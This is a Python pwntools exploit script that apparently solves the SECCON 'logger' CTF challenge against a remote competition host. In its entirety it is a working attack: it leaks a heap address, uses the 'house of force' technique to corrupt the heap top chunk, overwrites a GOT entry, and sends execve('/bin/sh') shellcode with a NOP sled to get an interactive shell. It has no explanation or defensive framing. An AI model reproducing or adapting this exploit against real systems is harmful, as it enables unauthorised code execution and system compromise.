from pwn import *
elf = "/root/pwn/seccon/logger"
#lib32 = "/root/pwn/seccon/libc-2.19.so-c4dc1270c1449536ab2efbbe7053231f1a776368"
#lib64 = "/lib/x86_64-linux-gnu/libc-2.21.so"
# s = process(elf)
# s1 = process(elf)
s = remote('logger.pwn.seccon.jp',6565)
s1 = remote('logger.pwn.seccon.jp',6565)
e = ELF(elf)
#l = ELF(lib32)
DEBUG = 0
if DEBUG > 0:
print "PID : %d" % util.proc.pidof(s)[0]
if DEBUG == 2:
context.log_level = 'debug'
uid = str(time.time())
#uid = "debug"
s.recvuntil("exit")
s.sendline("1")
s.sendline(uid)
s.sendline(uid)
s.recvuntil("exit")
print "[*] id : %s" % uid
s1.sendline("1")
s1.sendline(uid)
s1.sendline(uid)
def read(ss):
ss.sendline("1")
return ss.recvuntil("exit").split("1. Read log")[0]
def append(ss,size,data):
ss.sendline("2")
ss.recvuntil("128byte")
ss.sendline(str(size))
ss.sendline(data)
ss.recvuntil("exit")
def leak(ss):
ss.sendline("3")
ss.recvuntil("filename: ")
ss.recv(32)
t = ss.recvuntil("=")[:-1]
t += ("\x00" * (8-len(t)))
ss.recvuntil("exit")
return t
#buf = malloc(file_size) leak
heap_addr = u64( leak(s) )
print "[*] LEAK_HEAP : %x" % heap_addr
#house of force
#topchunk = ffffffffffffffff
append(s1,32,"\xff"*32)
read(s)
offset = 0x602050 - 0x28 - heap_addr# - (32+16)
print "[*] offset : %d" % offset
#append(s,"%d"%offset,"A")
append(s,"%d"%offset,"")
#got Overwrite
s.sendline("2")
s.sendline("128")
#http://shell-storm.org/shellcode/files/shellcode-806.php
sc = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
sc = "\x90"*(0x40-len(sc)) + sc
sc += p64(0x602080)
s.sendline(sc)
s.interactive()